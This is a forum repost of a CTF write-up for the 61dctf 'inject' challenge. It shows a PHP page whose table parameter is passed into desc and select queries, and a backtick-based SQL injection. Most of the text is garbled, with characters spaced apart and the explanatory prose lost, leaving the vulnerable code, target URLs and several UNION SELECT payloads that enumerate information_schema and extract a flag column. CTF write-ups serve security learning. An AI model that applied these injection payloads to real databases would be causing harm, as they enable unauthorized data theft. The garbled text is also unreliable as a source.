搜索

[27045] 2020-07-20_desc巧用及反引号`SQL注入——【61dctf】injectwriteup

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2020-07-20_desc巧用及反引号`SQL注入——【61dctf】injectwriteup d e s c   `   S Q L 6 1 d c t f   i n j e c t   w r i t e u p V e r .   M s 0 8 0 6 7   2 0 2 0 - 0 7 - 2 0   f l a g { x x x } h i n t ~ 使 F 1 2 t a b l e t a b l e t e s t t a b l e t a b l e $ t a b l e F i l t e r m y s q l i _ q u e r y ( ) H a c k e r ( ) m y s q l i _ q u e r y ( ) H a c k e r ( ) s q l t a b l e = t e s t f l a g { x x x }   h t t p : / / w e b . j a r v i s o j . c o m : 3 2 7 9 4 / h t t p : / / w e b . j a r v i s o j . c o m : 3 2 7 9 4 / i n d e x . p h p ~ < ? p h p r e q u i r e ( " c o n f i g . p h p " ) ; $ t a b l e   =   $ _ G E T [ ' t a b l e ' ] ? $ _ G E T [ ' t a b l e ' ] : " t e s t " ; $ t a b l e   =   F i l t e r ( $ t a b l e ) ; m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ { $ t a b l e } " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ; e c h o   $ r e t [ 0 ] ; ? > $ t a b l e   =   $ _ G E T [ ' t a b l e ' ] ? $ _ G E T [ ' t a b l e ' ] : " t e s t " ; ` $ t a b l e   =   F i l t e r ( $ t a b l e ) ; m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ { $ t a b l e } " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ; e c h o   $ r e t [ 0 ] ; h t t p : / / w e b . j a r v i s o j . c o m : 3 2 7 9 4 / i n d e x . p h p ? t a b l e = t e s t
t a b l e t a b l e = 1 2 3   H e l l o   H a c k e r t a b l e = t e s t f l a g { x x x } H a c k e r ( ) m y s q l i _ q u e r y ( ) t a b l e m y s q l i _ q u e r y ( ) H a c k e r ( ) K e y t a b l e d e s c   使 d e s c 使   `   ( )   E s c t e s t f r o m 使 使 d e s c 使 d e s c u s e r s h t t p : / / w e b . j a r v i s o j . c o m : 3 2 7 9 4 / i n d e x . p h p ? t a b l e = 1 2 3 / / < ? p h p r e q u i r e ( " c o n f i g . p h p " ) ; $ t a b l e   =   $ _ G E T [ ' t a b l e ' ] ? $ _ G E T [ ' t a b l e ' ] : " t e s t " ; $ t a b l e   =   F i l t e r ( $ t a b l e ) ; m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ { $ t a b l e } " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ; e c h o   $ r e t [ 0 ] ; ? > m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ { $ t a b l e } " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ;   `   m y s q l m y s q l s e l e c t     ` f r o m `   f r o m   t e s t d e s c   t a b l e n a m e     # t a b l e d e s c   u s e r s
d e s c   t a b l e = t e s t s e c r e t _ t e s t m y s q l i _ q u e r y ( ) f l a g { x x x } t a b l e = 1 2 3 s e c r e _ 1 2 3 h a c k e r ( ) S Q L p a y l o a d d e s c   s e c r e t _ t e s t s q l T i p 1 :   s q l     T i p 2 :   r e t 0 0 f l a g { x x x } 使 使 l i m i t   1 , 1 使 使 1 s e c r e t _ f l a g , s e c r e t _ t e s t   m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ { $ t a b l e } ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ { $ t a b l e } " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ; p a y l o a d :   ? t a b l e = t e s t `   `   u n i o n   s e l e c t   d a t a b a s e ( ) m y s q l i _ q u e r y ( $ m y s q l i , " d e s c   ` s e c r e t _ t e s t `   `   u n i o n   s e l e c t   d a t a b a s e ( ) ` " )   o r   H a c k e r ( ) ; $ s q l   =   " s e l e c t   ' f l a g { x x x } '   f r o m   s e c r e t _ t e s t `   `   u n i o n   s e l e c t   d a t a b a s e ( ) " ; $ r e t   =   s q l _ q u e r y ( $ s q l ) ; e c h o   $ r e t [ 0 ] ; p a y l o a d :   ? t a b l e = t e s t `   `   u n i o n   s e l e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s h c e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) l i m i t   1 , 1 p a y l o a d :   ? t a b l e = t e s t `   ` u n i o n   s e l e c t   g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   l i m i t   1 , 1
f l a g U w i l l N e v e r K n o w , u s e r n a m e   f l a g { l u c k y G a m e ~ } 1 .   d e s c   +       2 .     `   M y S Q L 3 .   l i m i t   h t t p s : / / b l o g . c s d n . n e t / q q _ 4 2 9 3 9 5 2 7 / a r t i c l e / d e t a i l s / 1 0 0 1 2 9 2 5 4       2 5 0 0 0 + p a y l o a d :   ? t a b l e = t e s t `   ` u n i o n   s e l e c t   g r o u p _ c o n c a t ( f l a g U w i l l N e v e r K n o w )   f r o m   s e c r e t _ f l a g
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理